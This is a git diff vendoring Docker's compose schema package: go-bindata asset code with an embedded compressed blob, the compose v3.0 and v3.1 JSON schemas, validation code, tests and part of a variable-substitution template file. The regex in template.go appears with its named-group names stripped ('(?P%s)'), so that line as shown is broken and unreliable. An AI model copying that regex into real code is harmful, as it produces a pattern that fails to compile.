ec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x15\x93\x43\xd3\x02\x08\x3a\x5
e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00") + +func dataConfig_schema_v31JsonBytes() ([]byte, error) { + return bindataRead( + _dataConfig_schema_v31Json, + "data/config_schema_v3.1.json", + ) +} + +func dataConfig_schema_v31Json() (*asset, error) { + bytes, err := dataConfig_schema_v31JsonBytes() + if err != nil 
{ + return nil, err + } + + info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} + a := &asset{bytes: bytes, info: info} + return a, nil +} + +// Asset loads and returns the asset for the given name. +// It returns an error if the asset could not be found or +// could not be loaded. +func Asset(name string) ([]byte, error) { + cannonicalName := strings.Replace(name, "\\", "/", -1) + if f, ok := _bindata[cannonicalName]; ok { + a, err := f() + if err != nil { + return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err) + } + return a.bytes, nil + } + return nil, fmt.Errorf("Asset %s not found", name) +} + +// MustAsset is like Asset but panics when Asset would return an error. +// It simplifies safe initialization of global variables. +func MustAsset(name string) []byte { + a, err := Asset(name) + if err != nil { + panic("asset: Asset(" + name + "): " + err.Error()) + } + + return a +} + +// AssetInfo loads and returns the asset info for the given name. +// It returns an error if the asset could not be found or +// could not be loaded. +func AssetInfo(name string) (os.FileInfo, error) { + cannonicalName := strings.Replace(name, "\\", "/", -1) + if f, ok := _bindata[cannonicalName]; ok { + a, err := f() + if err != nil { + return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err) + } + return a.info, nil + } + return nil, fmt.Errorf("AssetInfo %s not found", name) +} + +// AssetNames returns the names of the assets. +func AssetNames() []string { + names := make([]string, 0, len(_bindata)) + for name := range _bindata { + names = append(names, name) + } + return names +} + +// _bindata is a table, holding each asset generator, mapped to its name. 
+var _bindata = map[string]func() (*asset, error){ + "data/config_schema_v3.0.json": dataConfig_schema_v30Json, + "data/config_schema_v3.1.json": dataConfig_schema_v31Json, +} + +// AssetDir returns the file names below a certain +// directory embedded in the file by go-bindata. +// For example if you run go-bindata on data/... and data contains the +// following hierarchy: +// data/ +// foo.txt +// img/ +// a.png +// b.png +// then AssetDir("data") would return []string{"foo.txt", "img"} +// AssetDir("data/img") would return []string{"a.png", "b.png"} +// AssetDir("foo.txt") and AssetDir("notexist") would return an error +// AssetDir("") will return []string{"data"}. +func AssetDir(name string) ([]string, error) { + node := _bintree + if len(name) != 0 { + cannonicalName := strings.Replace(name, "\\", "/", -1) + pathList := strings.Split(cannonicalName, "/") + for _, p := range pathList { + node = node.Children[p] + if node == nil { + return nil, fmt.Errorf("Asset %s not found", name) + } + } + } + if node.Func != nil { + return nil, fmt.Errorf("Asset %s not found", name) + } + rv := make([]string, 0, len(node.Children)) + for childName := range node.Children { + rv = append(rv, childName) + } + return rv, nil +} + +type bintree struct { + Func func() (*asset, error) + Children map[string]*bintree +} +var _bintree = &bintree{nil, map[string]*bintree{ + "data": &bintree{nil, map[string]*bintree{ + "config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}}, + "config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}}, + }}, +}} + +// RestoreAsset restores an asset under the given directory +func RestoreAsset(dir, name string) error { + data, err := Asset(name) + if err != nil { + return err + } + info, err := AssetInfo(name) + if err != nil { + return err + } + err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755)) + if err != nil { + return err + } + err = ioutil.WriteFile(_filePath(dir, name), 
data, info.Mode()) + if err != nil { + return err + } + err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime()) + if err != nil { + return err + } + return nil +} + +// RestoreAssets restores an asset under the given directory recursively +func RestoreAssets(dir, name string) error { + children, err := AssetDir(name) + // File + if err != nil { + return RestoreAsset(dir, name) + } + // Dir + for _, child := range children { + err = RestoreAssets(dir, filepath.Join(name, child)) + if err != nil { + return err + } + } + return nil +} + +func _filePath(dir, name string) string { + cannonicalName := strings.Replace(name, "\\", "/", -1) + return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...) +} + diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json new file mode 100644 index 0000000000..fbcd8bb859 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json @@ -0,0 +1,383 @@ +{ + "$schema": "http://json-schema.org/draft-04/schema#", + "id": "config_schema_v3.0.json", + "type": "object", + "required": ["version"], + + "properties": { + "version": { + "type": "string" + }, + + "services": { + "id": "#/properties/services", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/service" + } + }, + "additionalProperties": false + }, + + "networks": { + "id": "#/properties/networks", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/network" + } + } + }, + + "volumes": { + "id": "#/properties/volumes", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/volume" + } + }, + "additionalProperties": false + } + }, + + "additionalProperties": false, + + "definitions": { + + "service": { + "id": "#/definitions/service", + "type": "object", + + 
"properties": { + "deploy": {"$ref": "#/definitions/deployment"}, + "build": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { + "context": {"type": "string"}, + "dockerfile": {"type": "string"}, + "args": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + } + ] + }, + "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cgroup_parent": {"type": "string"}, + "command": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "container_name": {"type": "string"}, + "depends_on": {"$ref": "#/definitions/list_of_strings"}, + "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "dns": {"$ref": "#/definitions/string_or_list"}, + "dns_search": {"$ref": "#/definitions/string_or_list"}, + "domainname": {"type": "string"}, + "entrypoint": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "env_file": {"$ref": "#/definitions/string_or_list"}, + "environment": {"$ref": "#/definitions/list_or_dict"}, + + "expose": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "expose" + }, + "uniqueItems": true + }, + + "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, + "healthcheck": {"$ref": "#/definitions/healthcheck"}, + "hostname": {"type": "string"}, + "image": {"type": "string"}, + "ipc": {"type": "string"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + + "logging": { + "type": "object", + + "properties": { + "driver": {"type": "string"}, + "options": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number", "null"]} + } + } + }, + "additionalProperties": false + }, + 
+ "mac_address": {"type": "string"}, + "network_mode": {"type": "string"}, + + "networks": { + "oneOf": [ + {"$ref": "#/definitions/list_of_strings"}, + { + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "oneOf": [ + { + "type": "object", + "properties": { + "aliases": {"$ref": "#/definitions/list_of_strings"}, + "ipv4_address": {"type": "string"}, + "ipv6_address": {"type": "string"} + }, + "additionalProperties": false + }, + {"type": "null"} + ] + } + }, + "additionalProperties": false + } + ] + }, + "pid": {"type": ["string", "null"]}, + + "ports": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "ports" + }, + "uniqueItems": true + }, + + "privileged": {"type": "boolean"}, + "read_only": {"type": "boolean"}, + "restart": {"type": "string"}, + "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "shm_size": {"type": ["number", "string"]}, + "sysctls": {"$ref": "#/definitions/list_or_dict"}, + "stdin_open": {"type": "boolean"}, + "stop_grace_period": {"type": "string", "format": "duration"}, + "stop_signal": {"type": "string"}, + "tmpfs": {"$ref": "#/definitions/string_or_list"}, + "tty": {"type": "boolean"}, + "ulimits": { + "type": "object", + "patternProperties": { + "^[a-z]+$": { + "oneOf": [ + {"type": "integer"}, + { + "type":"object", + "properties": { + "hard": {"type": "integer"}, + "soft": {"type": "integer"} + }, + "required": ["soft", "hard"], + "additionalProperties": false + } + ] + } + } + }, + "user": {"type": "string"}, + "userns_mode": {"type": "string"}, + "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "working_dir": {"type": "string"} + }, + "additionalProperties": false + }, + + "healthcheck": { + "id": "#/definitions/healthcheck", + "type": "object", + "additionalProperties": false, + "properties": { + "disable": {"type": "boolean"}, + "interval": {"type": "string"}, + "retries": {"type": "number"}, + "test": { + "oneOf": 
[ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "timeout": {"type": "string"} + } + }, + "deployment": { + "id": "#/definitions/deployment", + "type": ["object", "null"], + "properties": { + "mode": {"type": "string"}, + "replicas": {"type": "integer"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "update_config": { + "type": "object", + "properties": { + "parallelism": {"type": "integer"}, + "delay": {"type": "string", "format": "duration"}, + "failure_action": {"type": "string"}, + "monitor": {"type": "string", "format": "duration"}, + "max_failure_ratio": {"type": "number"} + }, + "additionalProperties": false + }, + "resources": { + "type": "object", + "properties": { + "limits": {"$ref": "#/definitions/resource"}, + "reservations": {"$ref": "#/definitions/resource"} + } + }, + "restart_policy": { + "type": "object", + "properties": { + "condition": {"type": "string"}, + "delay": {"type": "string", "format": "duration"}, + "max_attempts": {"type": "integer"}, + "window": {"type": "string", "format": "duration"} + }, + "additionalProperties": false + }, + "placement": { + "type": "object", + "properties": { + "constraints": {"type": "array", "items": {"type": "string"}} + }, + "additionalProperties": false + } + }, + "additionalProperties": false + }, + + "resource": { + "id": "#/definitions/resource", + "type": "object", + "properties": { + "cpus": {"type": "string"}, + "memory": {"type": "string"} + }, + "additionalProperties": false + }, + + "network": { + "id": "#/definitions/network", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "ipam": { + "type": "object", + "properties": { + "driver": {"type": "string"}, + "config": { + "type": "array", + "items": { + "type": "object", + "properties": { + "subnet": {"type": "string"} + }, + "additionalProperties": false + } + } 
+ }, + "additionalProperties": false + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "internal": {"type": "boolean"}, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "volume": { + "id": "#/definitions/volume", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "string_or_list": { + "oneOf": [ + {"type": "string"}, + {"$ref": "#/definitions/list_of_strings"} + ] + }, + + "list_of_strings": { + "type": "array", + "items": {"type": "string"}, + "uniqueItems": true + }, + + "list_or_dict": { + "oneOf": [ + { + "type": "object", + "patternProperties": { + ".+": { + "type": ["string", "number", "null"] + } + }, + "additionalProperties": false + }, + {"type": "array", "items": {"type": "string"}, "uniqueItems": true} + ] + }, + + "constraints": { + "service": { + "id": "#/definitions/constraints/service", + "anyOf": [ + {"required": ["build"]}, + {"required": ["image"]} + ], + "properties": { + "build": { + "required": ["context"] + } + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json new file mode 100644 index 0000000000..b7037485f9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json @@ -0,0 +1,428 @@ +{ + "$schema": "http://json-schema.org/draft-04/schema#", + "id": "config_schema_v3.1.json", + "type": "object", + "required": ["version"], + + "properties": { + 
"version": { + "type": "string" + }, + + "services": { + "id": "#/properties/services", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/service" + } + }, + "additionalProperties": false + }, + + "networks": { + "id": "#/properties/networks", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/network" + } + } + }, + + "volumes": { + "id": "#/properties/volumes", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/volume" + } + }, + "additionalProperties": false + }, + + "secrets": { + "id": "#/properties/secrets", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/secret" + } + }, + "additionalProperties": false + } + }, + + "additionalProperties": false, + + "definitions": { + + "service": { + "id": "#/definitions/service", + "type": "object", + + "properties": { + "deploy": {"$ref": "#/definitions/deployment"}, + "build": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { + "context": {"type": "string"}, + "dockerfile": {"type": "string"}, + "args": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + } + ] + }, + "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cgroup_parent": {"type": "string"}, + "command": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "container_name": {"type": "string"}, + "depends_on": {"$ref": "#/definitions/list_of_strings"}, + "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "dns": {"$ref": "#/definitions/string_or_list"}, + "dns_search": {"$ref": "#/definitions/string_or_list"}, + "domainname": {"type": "string"}, + "entrypoint": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} 
+ ] + }, + "env_file": {"$ref": "#/definitions/string_or_list"}, + "environment": {"$ref": "#/definitions/list_or_dict"}, + + "expose": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "expose" + }, + "uniqueItems": true + }, + + "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, + "healthcheck": {"$ref": "#/definitions/healthcheck"}, + "hostname": {"type": "string"}, + "image": {"type": "string"}, + "ipc": {"type": "string"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + + "logging": { + "type": "object", + + "properties": { + "driver": {"type": "string"}, + "options": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number", "null"]} + } + } + }, + "additionalProperties": false + }, + + "mac_address": {"type": "string"}, + "network_mode": {"type": "string"}, + + "networks": { + "oneOf": [ + {"$ref": "#/definitions/list_of_strings"}, + { + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "oneOf": [ + { + "type": "object", + "properties": { + "aliases": {"$ref": "#/definitions/list_of_strings"}, + "ipv4_address": {"type": "string"}, + "ipv6_address": {"type": "string"} + }, + "additionalProperties": false + }, + {"type": "null"} + ] + } + }, + "additionalProperties": false + } + ] + }, + "pid": {"type": ["string", "null"]}, + + "ports": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "ports" + }, + "uniqueItems": true + }, + + "privileged": {"type": "boolean"}, + "read_only": {"type": "boolean"}, + "restart": {"type": "string"}, + "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "shm_size": {"type": ["number", "string"]}, + "secrets": { + "type": "array", + "items": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { 
+ "source": {"type": "string"}, + "target": {"type": "string"}, + "uid": {"type": "string"}, + "gid": {"type": "string"}, + "mode": {"type": "number"} + } + } + ] + } + }, + "sysctls": {"$ref": "#/definitions/list_or_dict"}, + "stdin_open": {"type": "boolean"}, + "stop_grace_period": {"type": "string", "format": "duration"}, + "stop_signal": {"type": "string"}, + "tmpfs": {"$ref": "#/definitions/string_or_list"}, + "tty": {"type": "boolean"}, + "ulimits": { + "type": "object", + "patternProperties": { + "^[a-z]+$": { + "oneOf": [ + {"type": "integer"}, + { + "type":"object", + "properties": { + "hard": {"type": "integer"}, + "soft": {"type": "integer"} + }, + "required": ["soft", "hard"], + "additionalProperties": false + } + ] + } + } + }, + "user": {"type": "string"}, + "userns_mode": {"type": "string"}, + "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "working_dir": {"type": "string"} + }, + "additionalProperties": false + }, + + "healthcheck": { + "id": "#/definitions/healthcheck", + "type": "object", + "additionalProperties": false, + "properties": { + "disable": {"type": "boolean"}, + "interval": {"type": "string"}, + "retries": {"type": "number"}, + "test": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "timeout": {"type": "string"} + } + }, + "deployment": { + "id": "#/definitions/deployment", + "type": ["object", "null"], + "properties": { + "mode": {"type": "string"}, + "replicas": {"type": "integer"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "update_config": { + "type": "object", + "properties": { + "parallelism": {"type": "integer"}, + "delay": {"type": "string", "format": "duration"}, + "failure_action": {"type": "string"}, + "monitor": {"type": "string", "format": "duration"}, + "max_failure_ratio": {"type": "number"} + }, + "additionalProperties": false + }, + "resources": { + "type": "object", + "properties": { + "limits": {"$ref": 
"#/definitions/resource"}, + "reservations": {"$ref": "#/definitions/resource"} + } + }, + "restart_policy": { + "type": "object", + "properties": { + "condition": {"type": "string"}, + "delay": {"type": "string", "format": "duration"}, + "max_attempts": {"type": "integer"}, + "window": {"type": "string", "format": "duration"} + }, + "additionalProperties": false + }, + "placement": { + "type": "object", + "properties": { + "constraints": {"type": "array", "items": {"type": "string"}} + }, + "additionalProperties": false + } + }, + "additionalProperties": false + }, + + "resource": { + "id": "#/definitions/resource", + "type": "object", + "properties": { + "cpus": {"type": "string"}, + "memory": {"type": "string"} + }, + "additionalProperties": false + }, + + "network": { + "id": "#/definitions/network", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "ipam": { + "type": "object", + "properties": { + "driver": {"type": "string"}, + "config": { + "type": "array", + "items": { + "type": "object", + "properties": { + "subnet": {"type": "string"} + }, + "additionalProperties": false + } + } + }, + "additionalProperties": false + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "internal": {"type": "boolean"}, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "volume": { + "id": "#/definitions/volume", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + 
"additionalProperties": false + }, + + "secret": { + "id": "#/definitions/secret", + "type": "object", + "properties": { + "file": {"type": "string"}, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + } + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "string_or_list": { + "oneOf": [ + {"type": "string"}, + {"$ref": "#/definitions/list_of_strings"} + ] + }, + + "list_of_strings": { + "type": "array", + "items": {"type": "string"}, + "uniqueItems": true + }, + + "list_or_dict": { + "oneOf": [ + { + "type": "object", + "patternProperties": { + ".+": { + "type": ["string", "number", "null"] + } + }, + "additionalProperties": false + }, + {"type": "array", "items": {"type": "string"}, "uniqueItems": true} + ] + }, + + "constraints": { + "service": { + "id": "#/definitions/constraints/service", + "anyOf": [ + {"required": ["build"]}, + {"required": ["image"]} + ], + "properties": { + "build": { + "required": ["context"] + } + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go new file mode 100644 index 0000000000..ae33c77fbe --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/schema.go @@ -0,0 +1,137 @@ +package schema + +//go:generate go-bindata -pkg schema -nometadata data + +import ( + "fmt" + "strings" + "time" + + "github.com/pkg/errors" + "github.com/xeipuuv/gojsonschema" +) + +const ( + defaultVersion = "1.0" + versionField = "version" +) + +type portsFormatChecker struct{} + +func (checker portsFormatChecker) IsFormat(input string) bool { + // TODO: implement this + return true +} + +type durationFormatChecker struct{} + +func (checker durationFormatChecker) IsFormat(input string) bool { + _, err := time.ParseDuration(input) + return err == nil +} + +func init() { + gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{}) + 
gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{}) + gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{}) +} + +// Version returns the version of the config, defaulting to version 1.0 +func Version(config map[string]interface{}) string { + version, ok := config[versionField] + if !ok { + return defaultVersion + } + return normalizeVersion(fmt.Sprintf("%v", version)) +} + +func normalizeVersion(version string) string { + switch version { + case "3": + return "3.0" + default: + return version + } +} + +// Validate uses the jsonschema to validate the configuration +func Validate(config map[string]interface{}, version string) error { + schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version)) + if err != nil { + return errors.Errorf("unsupported Compose file version: %s", version) + } + + schemaLoader := gojsonschema.NewStringLoader(string(schemaData)) + dataLoader := gojsonschema.NewGoLoader(config) + + result, err := gojsonschema.Validate(schemaLoader, dataLoader) + if err != nil { + return err + } + + if !result.Valid() { + return toError(result) + } + + return nil +} + +func toError(result *gojsonschema.Result) error { + err := getMostSpecificError(result.Errors()) + description := getDescription(err) + return fmt.Errorf("%s %s", err.Field(), description) +} + +func getDescription(err gojsonschema.ResultError) string { + if err.Type() == "invalid_type" { + if expectedType, ok := err.Details()["expected"].(string); ok { + return fmt.Sprintf("must be a %s", humanReadableType(expectedType)) + } + } + + return err.Description() +} + +func humanReadableType(definition string) string { + if definition[0:1] == "[" { + allTypes := strings.Split(definition[1:len(definition)-1], ",") + for i, t := range allTypes { + allTypes[i] = humanReadableType(t) + } + return fmt.Sprintf( + "%s or %s", + strings.Join(allTypes[0:len(allTypes)-1], ", "), + allTypes[len(allTypes)-1], + ) + } + if definition == "object" { + return "mapping" + } 
+ if definition == "array" { + return "list" + } + return definition +} + +func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError { + var mostSpecificError gojsonschema.ResultError + + for _, err := range errors { + if mostSpecificError == nil { + mostSpecificError = err + } else if specificity(err) > specificity(mostSpecificError) { + mostSpecificError = err + } else if specificity(err) == specificity(mostSpecificError) { + // Invalid type errors win in a tie-breaker for most specific field name + if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" { + mostSpecificError = err + } + } + } + + return mostSpecificError +} + +func specificity(err gojsonschema.ResultError) int { + return len(strings.Split(err.Field(), ".")) +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go new file mode 100644 index 0000000000..0935d4022e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go @@ -0,0 +1,52 @@ +package schema + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +type dict map[string]interface{} + +func TestValidate(t *testing.T) { + config := dict{ + "version": "3.0", + "services": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + assert.NoError(t, Validate(config, "3.0")) +} + +func TestValidateUndefinedTopLevelOption(t *testing.T) { + config := dict{ + "version": "3.0", + "helicopters": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + err := Validate(config, "3.0") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Additional property helicopters is not allowed") +} + +func TestValidateInvalidVersion(t *testing.T) { + config := dict{ + "version": "2.1", + "services": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + err := Validate(config, "2.1") + assert.Error(t, err) + assert.Contains(t, err.Error(), "unsupported Compose 
file version: 2.1") +} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go new file mode 100644 index 0000000000..28495baf50 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/template/template.go @@ -0,0 +1,100 @@ +package template + +import ( + "fmt" + "regexp" + "strings" +) + +var delimiter = "\\$" +var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?" + +var patternString = fmt.Sprintf( + "%s(?i:(?P%s)|(?P%s)|{(?P%s)}|(?P))", + delimiter, delimiter, substitution, substitution, +) + +var pattern = regexp.MustCompile(patternString) + +// InvalidTemplateError is returned when a variable template is not in a valid +// format +type InvalidTemplateError struct { + Template string +} + +func (e InvalidTemplateError) Error() string { + return fmt.Sprintf("Invalid template: %#v", e.Template) +} + +// Mapping is a user-supplied function which maps from variable names to values. +// Returns the value as a string and a bool indicating whether +// the value is present, to distinguish between an empty string +// and the absence of a value. 
+type Mapping func(string) (string, bool) + +// Substitute variables in the string with their values +func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) { + result = pattern.ReplaceAllStringFunc(template, func(substring string) string { + matches := pattern.FindStringSubmatch(substring) + groups := make(map[string]string) + for i, name := range pattern.SubexpNames() { + if i != 0 { + groups[name] = matches[i] + } + } + + substitution := groups["named"] + if substitution == "" { + substitution = groups["braced"] + } + if substitution != "" { + // Soft default (fall back if unset or empty) + if strings.Contains(substitution, ":-") { + name, defaultValue := partition(substitution, ":-") + value, ok := mapping(name) + if !ok || value == "" { + return defaultValue + } + return value + } + + // Hard default (fall back if-and-only-if empty) + if strings.Contains(substitution, "-") { + name, defaultValue := partition(substitution, "-") + value, ok := mapping(name) + if !ok { + return defaultValue + } + return value + } + + // No default (fall back to empty string) + value, ok := mapping(substitution) + if !ok { + return "" + } + return value + } 